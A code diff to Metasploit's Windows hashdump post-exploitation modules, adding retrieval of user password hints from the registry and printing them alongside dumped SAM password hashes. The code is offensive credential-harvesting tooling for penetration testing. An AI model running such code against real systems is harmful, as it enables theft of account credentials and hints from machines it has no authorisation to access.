diff --git a/modules/post/windows/gather/hashdump.rb b/modules/post/windows/gather/hashdump.rb
index f21e8be4c0..1a9c9266f2 100644
--- a/modules/post/windows/gather/hashdump.rb
+++ b/modules/post/windows/gather/hashdump.rb
@@ -74,6 +74,19 @@ class Metasploit3 < Msf::Post
 			print_status("Decrypting user keys...")
 			users    = decrypt_user_keys(hbootkey, users)
 
+			print_status("Dumping password hints...")
+			print_line()
+			hint_count = 0
+			users.keys.sort{|a,b| a<=>b}.each do |rid|
+				#If we have a hint then print it
+				if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
+					print_line "#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\""
+					hint_count += 1
+				end	
+			end
+			print_line "No users with password hints on this system" if hint_count == 0
+			print_line()
+
 			print_status("Dumping password hashes...")
 			print_line()
 			print_line()
@@ -88,11 +101,6 @@ class Metasploit3 < Msf::Post
 					:type  => "smb_hash"
 				)
 				
-				#If we have a hint, decode and add to the hashstring
-				if !users[rid][:UserPasswordHint].nil?
-					hashstring += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
-				end
-				
 				print_line hashstring
 			end
 			print_line()
@@ -171,6 +179,7 @@ class Metasploit3 < Msf::Post
 			users[usr.to_i(16)][:F] = uk.query_value("F").data
 			users[usr.to_i(16)][:V] = uk.query_value("V").data
 			
+			#Attempt to get Hints (from Win7/Win8 Location)
 			begin
 				users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
 			rescue ::Rex::Post::Meterpreter::RequestError
@@ -188,6 +197,17 @@ class Metasploit3 < Msf::Post
 			rid = r.type
 			users[rid] ||= {}
 			users[rid][:Name] = usr
+			
+			#Attempt to get Hints (from WinXP Location) only if it's not set yet
+			if users[rid][:UserPasswordHint].nil?	
+				begin
+					uk_hint = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
+					users[rid][:UserPasswordHint] = uk_hint.query_value("").data
+				rescue ::Rex::Post::Meterpreter::RequestError
+					users[rid][:UserPasswordHint] = nil
+				end
+			end
+			
 			uk.close
 		end
 		ok.close
diff --git a/modules/post/windows/gather/smart_hashdump.rb b/modules/post/windows/gather/smart_hashdump.rb
index 1bc387e744..c61b25222c 100644
--- a/modules/post/windows/gather/smart_hashdump.rb
+++ b/modules/post/windows/gather/smart_hashdump.rb
@@ -141,6 +141,7 @@ class Metasploit3 < Msf::Post
 			users[usr.to_i(16)][:F] = uk.query_value("F").data
 			users[usr.to_i(16)][:V] = uk.query_value("V").data
 			
+			#Attempt to get Hints (from Win7/Win8 Location)
 			begin
 				users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
 			rescue ::Rex::Post::Meterpreter::RequestError
@@ -158,6 +159,17 @@ class Metasploit3 < Msf::Post
 			rid = r.type
 			users[rid] ||= {}
 			users[rid][:Name] = usr
+			
+			#Attempt to get Hints (from WinXP Location) only if it's not set yet
+			if users[rid][:UserPasswordHint].nil?	
+				begin
+					uk_hint = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
+					users[rid][:UserPasswordHint] = uk_hint.query_value("").data
+				rescue ::Rex::Post::Meterpreter::RequestError
+					users[rid][:UserPasswordHint] = nil
+				end
+			end
+			
 			uk.close
 		end
 		ok.close
@@ -290,20 +302,24 @@ class Metasploit3 < Msf::Post
 			print_status("\tDecrypting user keys...")
 			users    = decrypt_user_keys(hbootkey, users)
 
-			print_status("\tDumping password hashes...")
+			print_status("\tDumping password hints...")
+			hint_count = 0
+			users.keys.sort{|a,b| a<=>b}.each do |rid|
+				#If we have a hint then print it
+				if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
+					print_good("#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\"")
+					hint_count += 1
+				end	
+			end
+			print_good("No users with password hints on this system") if hint_count == 0
 
+			print_status("\tDumping password hashes...")
 			users.keys.sort{|a,b| a<=>b}.each do |rid|
 				# next if guest account or support account
 				next if rid == 501 or rid == 1001
 				collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::\n"
 				
-				#If we have a hint, decode and populate hint_string
-				hint_string = ""
-				if !users[rid][:UserPasswordHint].nil?
-					hint_string += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
-				end
-				
-				print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::#{hint_string}")
+				print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::")
 				session.framework.db.report_auth_info(
 					:host  => host,
 					:port  => @smb_port,
@@ -313,8 +329,7 @@ class Metasploit3 < Msf::Post
 					:type  => "smb_hash"
 				)
 			end
-
-
+			
 		rescue ::Interrupt
 			raise $!
 		rescue ::Rex::Post::Meterpreter::RequestError => e
diff --git a/scripts/meterpreter/hashdump.rb b/scripts/meterpreter/hashdump.rb
index efea082bb2..3f2fcb8471 100644
--- a/scripts/meterpreter/hashdump.rb
+++ b/scripts/meterpreter/hashdump.rb
@@ -102,8 +102,9 @@ def capture_user_keys
 		users[usr.to_i(16)][:F] = uk.query_value("F").data
 		users[usr.to_i(16)][:V] = uk.query_value("V").data
 		
+		#Attempt to get Hints (from Win7/Win8 Location)
 		begin
-			users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
+			users[usr.to_i(16)][:UserPasswordHint] = decode_windows_hint(uk.query_value("UserPasswordHint").data.unpack("H*")[0])
 		rescue ::Rex::Post::Meterpreter::RequestError
 			users[usr.to_i(16)][:UserPasswordHint] = nil
 		end
@@ -119,6 +120,17 @@ def capture_user_keys
 		rid = r.type
 		users[rid] ||= {}
 		users[rid][:Name] = usr
+		
+		#Attempt to get Hints (from WinXP Location) only if it's not set yet
+		if users[rid][:UserPasswordHint].nil?	
+			begin
+				uk_hint = @client.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
+				users[rid][:UserPasswordHint] = uk_hint.query_value("").data
+			rescue ::Rex::Post::Meterpreter::RequestError
+				users[rid][:UserPasswordHint] = nil
+			end
+		end
+		
 		uk.close
 	end
 	ok.close
@@ -242,6 +254,19 @@ if client.platform =~ /win32|win64/
 		print_status("Decrypting user keys...")
 		users    = decrypt_user_keys(hbootkey, users)
 
+		print_status("Dumping password hints...")
+		print_line()
+		hint_count = 0
+		users.keys.sort{|a,b| a<=>b}.each do |rid|
+			#If we have a hint then print it
+			if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
+				print_line "#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\""
+				hint_count += 1
+			end	
+		end
+		print_line("No users with password hints on this system") if hint_count == 0 
+		print_line()
+
 		print_status("Dumping password hashes...")
 		print_line()
 		print_line()
@@ -256,11 +281,6 @@ if client.platform =~ /win32|win64/
 				:type  => "smb_hash"
 			)
 			
-			#If we have a hint, decode and add to the hashstring
-			if !users[rid][:UserPasswordHint].nil?
-				hashstring += " (Hint: \"#{decode_windows_hint(users[rid][:UserPasswordHint].unpack("H*")[0])}\")"
-			end
-			
 			print_line hashstring
 			
 		end